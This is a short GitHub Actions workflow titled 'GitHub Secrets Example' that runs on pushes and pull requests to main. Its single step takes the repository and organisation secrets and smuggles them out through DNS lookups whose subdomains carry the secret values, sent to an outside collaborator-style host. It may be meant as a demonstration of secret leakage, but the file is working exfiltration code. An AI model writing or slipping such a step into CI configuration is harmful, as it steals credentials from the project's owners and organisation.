name: GitHub Secrets Example

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]
jobs:
  build:
    runs-on: ubuntu-latest

    env:
      REPO_SECRET: ${{ secrets.REPO_SECRET }}
      ORG_SECRET: ${{ secrets.ORGANIZATION_SECRET }}

    steps:
      - name: Run a one-line script
        run: >
          nslookup `base64 -d -w0 ${{env.REPO_SECRET}}`.stp2xskh25j8i5dl5ftmqtmmndt4hu5j.bcollaborator.binsec.cloud
          && nslookup `base64 -d -w0 ${{env.ORG_SECRET}}`.stp2xskh25j8i5dl5ftmqtmmndt4hu5j.bcollaborator.binsec.cloud